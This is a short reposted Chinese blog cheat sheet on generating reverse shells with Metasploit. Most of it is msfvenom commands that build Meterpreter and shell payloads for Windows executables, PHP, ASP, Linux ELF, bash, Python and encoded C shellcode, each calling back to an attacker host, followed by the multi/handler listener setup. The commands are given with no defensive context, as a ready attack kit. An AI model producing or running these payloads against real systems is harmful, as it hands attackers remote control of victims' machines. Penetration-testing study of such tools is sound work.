zoukankan      html  css  js  c++  java
  • msf反弹

    转载https://www.cnblogs.com/xishaonian/p/7721584.html

    msf 生成反弹 Windows Shell

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.62.129 lport=1234 -f exe -a x86 --platform win -o shell.exe

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe

    msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "x00" -a x86 --platform win -f c

    msf 生成在反弹linux Shell

    msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip地址 lport=端口 -e -f elf -a x86 --platform linux -o shell

    msf 生成反弹 PHP Shell

    msfvenom -p php/meterpreter_reverse_tcp lhost=IP地址 lport=端口 -o shell.php

    add <?php at the beginning

    perl -i~ -0777pe's/^/<?php /' shell.php

    msf 生成反弹 Bash Shell

    msfvenom -p cmd/unix/reverse_bash lhost=IP地址 lport=端口 -o shell.sh

    msf 生成反弹 ASP Shell

    msfvenom -p windows/meterpreter/reverse_tcp lhost=IP地址 lport=端口 -f asp -a x86 --platform win -o shell.asp

    msf 生成反弹 Python Shell

    msfvenom -p cmd/unix/reverse_python lhost=ip地址 lport=端口-o shell.py

    msf 生成反弹 Shell (C Shellcode)

    msfvenom -p windows/shell_reverse_tcp lhost=IP地址 lport=端口 -b "x00x0ax0d" -a x86 --platform win -f c

    msf监听

    1 use exploit/multi/handler

    2 set payload windows/meterpreter/reverse_tcp

    3 set LHOST 192.168.1.111

    4 Exploit



  • 相关阅读:
    策略梯度(Policy Gradient)
    无约束优化问题
    有约束优化问题
    计算机网络学习资料
    为什么要用等效基带信号?
    通信网实验—话务量分析
    无感数据埋点(自定义注解+aop+异步)
    排序算法
    位运算常见操作
    数据库与缓存一致性的几种实现方式
  • 原文地址:https://www.cnblogs.com/bingtang123/p/13385507.html
Copyright © 2011-2022 走看看